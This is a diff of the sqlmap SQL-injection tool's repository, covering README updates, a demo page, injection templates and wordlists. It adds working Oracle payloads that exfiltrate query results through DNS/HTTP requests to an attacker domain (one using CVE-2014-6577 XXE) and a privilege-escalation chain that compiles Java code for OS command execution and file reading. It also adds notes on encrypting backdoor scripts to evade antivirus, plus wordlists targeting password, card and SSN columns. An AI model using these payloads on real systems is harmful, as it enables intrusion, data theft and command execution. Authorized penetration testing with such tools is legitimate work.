-You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking  [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
 
 Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
 
-    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
 
-sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
 
 Usage
 ----
@@ -34,33 +34,45 @@ To get a list of all options and switches use:
     python sqlmap.py -hh
 
 You can find a sample run [here](https://asciinema.org/a/46601).
-To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki).
+To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
 
 Links
 ----
 
-* Homepage: http://sqlmap.org
+* Homepage: https://sqlmap.org
 * Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
 * User's manual: https://github.com/sqlmapproject/sqlmap/wiki
 * Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* X: [@sqlmap](https://twitter.com/sqlmap)
-* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
-* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
 * Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
 
 Translations
 ----
 
+* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
 * [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
 * [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
 * [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
+* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
+* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
 * [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
 * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
+* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
+* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md)
+* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
+* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
+* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
+* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
 * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
 * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
+* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
+* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)

data/html/index.html

@@ -0,0 +1,151 @@
+<!DOCTYPE html>
+
+<!-- https://angrytools.com/bootstrap/editor/ -->
+
+<html lang="en">
+<head>
+    <title>DEMO</title>
+    <meta charset="utf-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1">
+    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
+    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css" rel="stylesheet">
+
+    <!--[if lt IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
+</head>
+<body>
+    <style>
+  #wrapper { width: 100%; }
+
+  #page-wrapper {
+    padding: 0 15px;
+    min-height: 568px;
+    background-color: #fff;
+  }
+
+  @media(min-width:768px) {
+    #page-wrapper {
+      position: inherit;
+      margin: 0 0 0 250px;
+      padding: 0 30px;
+      border-left: 1px solid #e7e7e7;
+    }
+  }
+
+  .sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }
+  .sidebar .sidebar-search { padding: 15px; }
+  .sidebar ul li { border-bottom: 1px solid #e7e7e7; }
+
+  .sidebar ul li a.active { background-color: #eee; }
+
+  .sidebar .arrow { float: right;}
+  .sidebar .fa.arrow:before { content: "f104";}
+  .sidebar .active>a>.fa.arrow:before { content: "f107"; }
+  .sidebar .nav-second-level li,
+  .sidebar .nav-third-level li {
+    border-bottom: 0!important;
+  }
+
+  .sidebar .nav-second-level li a { padding-left: 37px; }
+  .sidebar .nav-third-level li a { padding-left: 52px; }
+
+  @media(min-width:768px) {
+    .sidebar {
+      z-index: 1;
+      position: absolute;
+      width: 250px;
+      margin-top: 51px;
+    }
+  }
+</style>
+<div id="wrapper">
+
+  <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
+    <div class="navbar-header">
+      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
+        <span class="sr-only">Toggle navigation</span>
+        <span class="icon-bar"></span>
+        <span class="icon-bar"></span>
+        <span class="icon-bar"></span>
+      </button>
+      <a class="navbar-brand" href="index.html">sqlmap</a>
+    </div>
+
+    <div class="navbar-default sidebar" role="navigation">
+      <div class="sidebar-nav navbar-collapse">
+        <ul class="nav" id="side-menu">
+          <li>
+            <a href="#"><em class="glyphicon glyphicon-home"></em> Options<span class="arrow"></span></a>
+            <ul class="nav nav-second-level">
+              <li><a>Target</a></li>
+              <li><a>Request</a></li>
+              <li><a>Optimization</a></li>
+              <li><a>Injection</a></li>
+              <li><a>Detection</a></li>
+              <li><a>Techniques</a></li>
+              <li><a>Fingerprint</a></li>
+              <li><a>Enumeration</a></li>
+              <li><a>Brute force</a></li>
+              <li><a>User-defined function injection</a></li>
+              <li><a>File system access</a></li>
+              <li><a>Operating system access</a></li>
+              <li><a>Windows registry access</a></li>
+              <li><a>General</a></li>
+              <li><a>Miscellaneous</a></li>
+            </ul>
+          </li>
+        </ul>
+      </div>
+    </div>
+  </nav>
+
+  <div id="page-wrapper">
+    <div class="row">
+      <h4>DEMO</h4>
+    </div>
+  </div>
+</div>
+<script>
+  /*
+ * metismenu - v1.0.3
+ * Easy menu jQuery plugin for Twitter Bootstrap 3
+ * https://github.com/onokumus/metisMenu
+ *
+ * Made by Osman Nuri Okumuş
+ * Under MIT License
+*/
+  !function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e="metisMenu",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find("li.active").has("ul").children("ul").collapse("show"),b.find("li").not(".active").has("ul").children("ul").collapse("hide")):(b.find("li.active").has("ul").children("ul").addClass("collapse in"),b.find("li").not(".active").has("ul").children("ul").addClass("collapse")),b.find("li").has("ul").children("a").on("click",function(b){b.preventDefault(),a(this).parent("li").toggleClass("active").children("ul").collapse("toggle"),c&&a(this).parent("li").siblings().removeClass("active").children("ul.in").collapse("hide")})},isIE:function(){for(var a,b=3,d=c.createElement("div"),e=d.getElementsByTagName("i");d.innerHTML="<!--[if gt IE "+ ++b+"]><i></i><![endif]-->",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,"plugin_"+e)||a.data(this,"plugin_"+e,new d(this,b))})}}(jQuery,window,document);
+
+  $(function() {
+
+    $('#side-menu').metisMenu();
+
+  });
+
+  //Loads the correct sidebar on window load,
+  //collapses the sidebar on window resize.
+  // Sets the min-height of #page-wrapper to window size
+  $(function() {
+    $(window).bind("load resize", function() {
+      topOffset = 50;
+      width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;
+      if (width < 768) {
+        $('div.navbar-collapse').addClass('collapse')
+        topOffset = 100; // 2-row-menu
+      } else {
+        $('div.navbar-collapse').removeClass('collapse')
+      }
+
+      height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;
+      height = height - topOffset;
+      if (height < 1) height = 1;
+      if (height > topOffset) {
+        $("#page-wrapper").css("min-height", (height) + "px");
+      }
+    })
+  });
+</script>
+    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
+    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
+</body>
+</html>

data/procs/mysql/write_file_limit.sql

@@ -1 +1 @@
-LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- 
+LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -

data/procs/oracle/dns_request.sql

@@ -0,0 +1,3 @@
+SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual 

data/procs/oracle/read_file_export_extension.sql

@@ -0,0 +1,4 @@
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL

data/shell/README.txt

@@ -0,0 +1,7 @@
+Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.
+
+To prepare the original scripts to the cloaked form use this command:
+find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
+
+To get back them into the original form use this:
+find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;

data/shell/backdoors/backdoor.asp_

@@ -0,0 +1,3 @@
+=ªòÜ©«t µ›ÉøbŒð‹ÒëRÁU&hÓàŸR}DtCñ–!¶³3ç¤y¨œ>—à7ôë	pQMÆÀb-{Yž?<3F>=úáÑl<C391>ÜÙ²„]½6a\ÝÍ5Ñ
+¡§]iª¾³Z©Á*ðpO|ØSkœã“ã¬ÐC)<29>1š»Os|èEÀ„f@l§<6C>{ä´a2¹ßý(¾ÌPrãÇ8CÓ©•nð%f•¢ßš A<>ú=¬‹@ç(x™~£•Üïê­Ö±†$ˉ)9<ˆWt³2SG„·Ê5©
+B䤚2…€TX<54>zO3sG<73>DëLú

data/txt/common-columns.txt

@@ -1,5 +1,5 @@
-# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# See the file 'LICENSE' for copying permission
 
 id
 name
@@ -471,8 +471,10 @@ settingsid
 lname
 sale_date
 module_addr
+flag
 
 # spanish
+
 usuario
 nombre
 contrasena
@@ -483,8 +485,11 @@ llave
 chaveta
 tono
 cuna
+correo
+contrasenia
 
 # german
+
 benutzername
 benutzer
 passwort
@@ -498,6 +503,7 @@ stichwort
 schlusselwort
 
 # french
+
 utilisateur
 usager
 consommateur
@@ -509,6 +515,7 @@ touche
 clef
 
 # italian
+
 utente
 nome
 utilizzatore
@@ -520,17 +527,109 @@ chiavetta
 cifrario
 
 # portuguese
+
 usufrutuario
 chave
 cavilha
 
 # slavic
+
 korisnik
 sifra
 lozinka
 kljuc
 
+# turkish
+
+isim
+ad
+adi
+soyisim
+soyad
+soyadi
+kimlik
+kimlikno
+tckimlikno
+tckimlik
+yonetici
+sil
+silinmis
+numara
+sira
+lokasyon
+kullanici
+kullanici_adi
+sifre
+giris
+pasif
+posta
+adres
+is_adres
+ev_adres
+is_adresi
+ev_adresi
+isadresi
+isadres
+evadresi
+evadres
+il
+ilce
+eposta
+eposta_adres
+epostaadres
+eposta_adresi
+epostaadresi
+e-posta
+e-posta_adres
+e-postaadres
+e-posta_adresi
+e-postaadresi
+e_posta
+e_posta_adres
+e_postaadres
+e_posta_adresi
+e_postaadresi
+baglanti
+gun
+ay
+yil
+saat
+tarih
+guncelleme
+guncellemetarih
+guncelleme_tarih
+guncellemetarihi
+guncelleme_tarihi
+yetki
+cinsiyet
+ulke
+guncel
+vergi
+vergino
+vergi_no
+yas
+dogum
+dogumtarih
+dogum_tarih
+dogumtarihi
+dogum_tarihi
+telefon_is
+telefon_ev
+telefonis
+telefonev
+ev_telefonu
+is_telefonu
+ev_telefon
+is_telefon
+evtelefonu
+istelefonu
+evtelefon
+istelefon
+kontak
+kontaklar
+
 # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)
+
 user
 pass
 cc_number
@@ -701,7 +800,9 @@ news
 nick
 number
 nummer
+passhash
 pass_hash
+password_hash
 passwordsalt
 personal_key
 phone
@@ -754,6 +855,7 @@ xar_name
 xar_pass
 
 # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
+
 account
 accnts
 accnt
@@ -823,6 +925,7 @@ user_pwd
 user_passwd
 
 # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)
+
 fld_id
 fld_username
 fld_password
@@ -975,6 +1078,7 @@ yhmm
 yonghu
 
 # site:br
+
 content_id
 codigo
 geometry
@@ -1231,6 +1335,7 @@ newssummaryauthor
 and_xevento
 
 # site:de
+
 rolle_nr
 standort_nr
 ja
@@ -1393,6 +1498,7 @@ summary_id
 gameid
 
 # site:es
+
 catid
 dni
 prune_id
@@ -1482,6 +1588,7 @@ time_stamp
 bannerid
 
 # site:fr
+
 numero
 id_auteur
 titre
@@ -1533,6 +1640,7 @@ n_dir
 age
 
 # site:ru
+
 dt_id
 subdivision_id
 sub_class_id
@@ -1736,8 +1844,13 @@ banner_id
 error
 language_id
 val
+parol
+familiya
+imya
+otchestvo
 
 # site:jp
+
 dealer_id
 modify_date
 regist_date
@@ -1869,6 +1982,7 @@ c_commu_topic_id
 c_diary_comment_log_id
 
 # site:it
+
 idcomune
 idruolo
 idtrattamento
@@ -2372,6 +2486,7 @@ client_img
 does_repeat
 
 # site:cn
+
 typeid
 cronid
 advid
@@ -2547,6 +2662,7 @@ disablepostctrl
 fieldname
 
 # site:id
+
 ajar
 akses
 aktif
@@ -2562,6 +2678,7 @@ jeda
 jenis
 jml
 judul
+jumlah
 kata_kunci
 kata_sandi
 katakunci
@@ -2574,6 +2691,7 @@ kunci
 lahir
 nama
 nama_akun
+nama_ibu_kandung
 nama_pengguna
 namaakun
 namapengguna
@@ -2583,6 +2701,7 @@ pengguna
 penjelasan
 perusahaan
 ponsel
+profesi
 ruang
 sandi
 soal
@@ -2590,6 +2709,7 @@ surat_elektronik
 surel
 tanggal
 tanggal_lahir
+telepon
 tempat
 tempat_lahir
 tmp_lahir
@@ -2598,5 +2718,52 @@ urut
 waktu
 
 # WebGoat
+
 cookie
 login_count
+
+# https://sqlwiki.netspi.com/attackQueries/dataTargeting/
+
+credit
+card
+pin
+cvv
+pan
+password
+social
+ssn
+account
+confidential
+
+# site:nl
+
+naam
+straat
+gemeente
+beschrijving
+id_gebruiker
+gebruiker_id
+gebruikersnaam
+wachtwoord
+telefoon
+voornaam
+achternaam
+geslacht
+huisnummer
+gemeente
+leeftijd
+
+# site:cn
+
+yonghuming
+mima
+xingming
+xingbie
+touxiang
+youxiang
+shouji
+
+# Misc
+
+u_pass
+hashedPw

data/txt/common-outputs.txt

@@ -1,5 +1,5 @@
-# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# See the file 'LICENSE' for copying permission
 
 [Banners]
 
@@ -12,7 +12,9 @@
 5.1.
 5.5.
 5.6.
+5.7.
 6.0.
+8.0.
 
 # PostgreSQL
 PostgreSQL 7.0
@@ -30,6 +32,13 @@ PostgreSQL 9.0
 PostgreSQL 9.1
 PostgreSQL 9.2
 PostgreSQL 9.3
+PostgreSQL 9.4
+PostgreSQL 9.5
+PostgreSQL 9.6
+PostgreSQL 10.
+PostgreSQL 11.
+PostgreSQL 12.
+PostgreSQL 13.
 
 # Oracle
 Oracle Database 9i Standard Edition Release
@@ -49,12 +58,18 @@ Oracle Database 11g Express Edition Release
 Oracle Database 11g Express Edition Release 11.
 Oracle Database 11g Enterprise Edition Release
 Oracle Database 11g Enterprise Edition Release 11.
+Oracle Database 12c
 
 # Microsoft SQL Server
 Microsoft SQL Server 7.0
 Microsoft SQL Server 2000
 Microsoft SQL Server 2005
 Microsoft SQL Server 2008
+Microsoft SQL Server 2012
+Microsoft SQL Server 2014
+Microsoft SQL Server 2016
+Microsoft SQL Server 2017
+Microsoft SQL Server 2019
 
 
 [Users]
@@ -384,6 +399,7 @@ XDBWEBSERVICES
 
 # MySQL
 information_schema
+performance_schema
 mysql
 phpmyadmin
 

data/txt/common-tables.txt

@@ -1,5 +1,5 @@
-# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+# Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# See the file 'LICENSE' for copying permission
 
 users
 customer
@@ -442,6 +442,7 @@ exchange
 Status
 WORKS_ON
 lines
+testusers
 booleantests
 QRTZ_SIMPLE_TRIGGERS
 mobile_menu
@@ -1615,8 +1616,10 @@ SPACE
 geo_Sea
 DATA_ORG
 Contributor
+flag
 
 # Various Joomla tables
+
 jos_vm_product_download
 jos_vm_coupons
 jos_vm_product_reviews
@@ -1710,6 +1713,7 @@ publicusers
 cmsusers
 
 # List provided by Anastasios Monachos (anastasiosm@gmail.com)
+
 blacklist
 cost
 moves
@@ -1761,6 +1765,7 @@ TBLCORPUSERS
 TBLCORPORATEUSERS
 
 # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)
+
 tbladmins
 sort
 _wfspro_admin
@@ -1820,6 +1825,7 @@ jos_comprofiler_members
 jos_joomblog_users
 jos_moschat_users
 knews_lostpass
+korisnik
 korisnici
 kpro_adminlogs
 kpro_user
@@ -2047,6 +2053,7 @@ Login
 Logins
 
 # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
+
 account
 accnts
 accnt
@@ -2116,6 +2123,7 @@ user_pwd
 user_passwd
 
 # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047)
+
 wsop
 Admin
 Config
@@ -2208,6 +2216,7 @@ admin_pwd
 admin_pass
 adminpassword
 admin_password
+admin_passwords
 usrpass
 usr_pass
 pass
@@ -2436,9 +2445,11 @@ Affichage1name
 sb_host_adminAffichage1name
 
 # site:jp
+
 TypesTab
 
 # site:it
+
 utenti
 categorie
 attivita
@@ -2580,6 +2591,7 @@ oil_stats_agents
 SGA_XPLAN_TPL_DBA_INDEXES
 
 # site:fr
+
 Avion
 departement
 Compagnie
@@ -2750,6 +2762,7 @@ spip_ortho_dico
 spip_caches
 
 # site:ru
+
 guestbook
 binn_forum_settings
 binn_forms_templ
@@ -2847,6 +2860,7 @@ binn_path_temps
 order_item
 
 # site:de
+
 tt_content
 kunde
 medien
@@ -3009,6 +3023,7 @@ wp_categories
 chessmessages
 
 # site:br
+
 endereco
 pessoa
 usuarios
@@ -3171,6 +3186,7 @@ LT_CUSTOM2
 LT_CUSTOM3
 
 # site:es
+
 jos_respuestas
 DEPARTAMENTO
 EMPLEADO
@@ -3207,8 +3223,13 @@ nuke_gallery_pictures_newpicture
 Books
 grupo
 facturas
+aclaraciones
+preguntas
+personas
+estadisticas
 
 # site:cn
+
 url
 cdb_adminactions
 BlockInfo
@@ -3353,7 +3374,230 @@ aliastype
 mymps_mail_sendlist
 mymps_navurl
 
+# site:tr
+
+kullanici
+kullanicilar
+yonetici
+yoneticiler
+adres
+adresler
+yayincilar
+yayinci
+urun
+urunler
+kategori
+kategoriler
+ulke
+ulkeler
+siparis
+siparisler
+bayi
+bayiler
+stok
+reklam
+reklamlar
+site
+siteler
+sayfa
+sayfalar
+icerik
+icerikler
+yazi
+yazilar
+genel
+istatistik
+istatistikler
+duyuru
+duyurular
+haber
+haberler
+komisyon
+ucret
+ucretler
+bilgi
+basvuru
+basvurular
+kontak
+kontaklar
+kisi
+kisiler
+uye
+uyeler
+kayıt
+kayıtlar
+tel
+telefon
+telefonlar
+numaralar
+numara
+kart
+kartlar
+kredi
+krediler
+kredikartı
+fiyat
+fiyatlar
+odeme
+odemeler
+kategoriler
+tbl_Uye
+xml_kategoriler
+tbl_siparis
+tbl_googlemap
+tbl_ilce
+tbl_yardim
+tbl_Resim
+tbl_anket
+tbl_Rapor
+tbl_statsvisit
+tbl_ticket
+tbl_Cesit
+tbl_xml
+tbl_Cinsiyet
+xml_urunler_temp
+tbl_takvim
+tbl_altkategori
+tbl_mesaj
+tbl_Haber
+tbl_AdresTemp
+tbl_Firma
+tbl_Medya
+xml_urunlerbirim
+tbl_Yardim
+tbl_medya
+tbl_Video
+xml_markalar_transfer
+tbl_adrestemp
+tbl_online
+tbl_sehir
+tbl_resim
+tbl_Gorsel
+tbl_doviz
+tbl_gorsel
+tbl_kampanya
+tbl_Blog
+tbl_Banners
+tbl_koleksiyon
+tbl_Galeri
+tbl_Kampanya
+tbl_Favori
+tbl_sss
+tbl_Banner
+tbl_Faq
+xml_markalar_temp
+tbl_faq
+tbl_Personel
+tbl_Seo
+tbl_adres
+tbl_ayar
+tbl_metin
+tbl_AltKategori
+tbl_kategori
+tbl_Marka
+tbl_blogkategori
+tbl_ulke
+tbl_sepetold
+tbl_yorum
+tbl_Fiyat
+tbl_Reklam
+tbl_Kategori
+tbl_Yorum
+tbl_semt
+tbl_Tedarikci
+xml_kampanyakategori
+tbl_ozelgun
+tbl_uyexml
+tbl_rapor
+tbl_seo
+tbl_Indirim
+tbl_Ilce
+tbl_bulten
+tbl_video
+tbl_Ayar
+tbl_fatura
+tbl_cinsiyet
+tbl_reklam
+tbl_sliders
+tbl_KDV
+tbl_uye_img
+tbl_siparisid
+tbl_BlogKategori
+tbl_Yonetici
+tbl_kdv
+tbl_Online
+tbl_temsilci
+tbl_Dil
+tbl_banners
+tbl_Mesaj
+tbl_Logs
+tbl_logs
+tbl_fiyat
+tbl_SSS
+tbl_Puan
+tbl_kargo
+tbl_Statsvisit
+tbl_Koleksiyon
+tbl_dil
+tbl_Sepetold
+tbl_Fatura
+tbl_yonetici
+tbl_Yazilar
+tbl_Temsilci
+tbl_Kargo
+tbl_cesit
+tbl_uye
+tbl_haber
+tbl_SiparisID
+tbl_Adres
+tbl_Ozelgun
+tbl_banka
+tbl_Videogaleri
+tbl_galeri
+tbl_videogaleri
+xml_urunresimleri
+tbl_urun
+tbl_Ticket
+tbl_yazilar
+tbl_Ulke
+tbl_Urun
+tbl_renk
+tbl_Harita
+tbl_Sepet
+tbl_Sehir
+tbl_Uye_Img
+tbl_Semt
+tbl_indirim
+xml_kampanyakategori_transfer
+tbl_Takvim
+tbl_blog
+tbl_Sliders
+tbl_Renk
+tbl_UyeXML
+tbl_tedarikci
+tbl_Fotogaleri
+tbl_Doviz
+tbl_Anket
+tbl_Banka
+tbl_Metin
+tbl_XML
+tbl_firma
+tbl_harita
+tbl_banner
+tbl_sepet
+tbl_fotogaleri
+tbl_marka
+tbl_Siparis
+tbl_personel
+tbl_puan
+tbl_Bulten
+tbl_favori
+tbl_onlineusers
+
+
+
 # List provided by Pedrito Perez (0ark1ang3l@gmail.com)
+
 adminstbl
 admintbl
 affiliateUsers
@@ -3368,4 +3612,152 @@ userstbl
 usertbl
 
 # WebGoat
+
 user_data
+
+# https://laurent22.github.io/so-injections/
+
+accounts
+admin
+baza_site
+benutzer
+category
+comments
+company
+credentials
+Customer
+customers
+data
+details
+dhruv_users
+dt_tb
+employees
+events
+forsale
+friends
+giorni
+images
+info
+items
+kontabankowe
+login
+logs
+markers
+members
+messages
+orders
+order_table
+photos
+player
+players
+points
+register
+reports
+rooms
+shells
+signup
+songs
+student
+students
+table
+table2
+tbl_images
+tblproduct
+testv2
+tickets
+topicinfo
+trabajo
+user
+user_auth
+userinfo
+user_info
+userregister
+users
+usuarios
+utenti
+wm_products
+wp_payout_history
+zamowienia
+
+# https://deliciousbrains.com/tour-wordpress-database/
+
+wp_blogmeta
+wp_blogs
+wp_blog_versions
+wp_commentmeta
+wp_comments
+wp_links
+wp_options
+wp_postmeta
+wp_posts
+wp_registration_log
+wp_signups
+wp_site
+wp_sitemeta
+wp_termmeta
+wp_term_relationships
+wp_terms
+wp_term_taxonomy
+wp_usermeta
+wp_users
+
+# https://docs.joomla.org/Tables
+
+assets
+bannerclient
+banner
+bannertrack
+categories
+components
+contact_details
+content_frontpage
+content_rating
+content
+core_acl_aro_groups
+core_acl_aro_map
+core_acl_aro_sections
+core_acl_aro
+core_acl_groups_aro_map
+core_log_items
+core_log_searches
+extensions
+groups
+languages
+menu
+menu_types
+messages_cfg
+messages
+migration_backlinks
+modules_menu
+modules
+newsfeeds
+plugins
+poll_data
+poll_date
+poll_menu
+polls
+redirect_links
+Schemas
+sections
+session
+stats_agents
+templates_menu
+template_styles
+update_categories
+update_sites_extensions
+update_sites
+updates
+usergroups
+user_profiles
+users
+user_usergroup_map
+viewlevels
+weblinks
+
+# site:nl
+
+gebruikers
+
+# site:cn
+
+yonghu

data/txt/sha256sums.txt

@@ -0,0 +1,630 @@
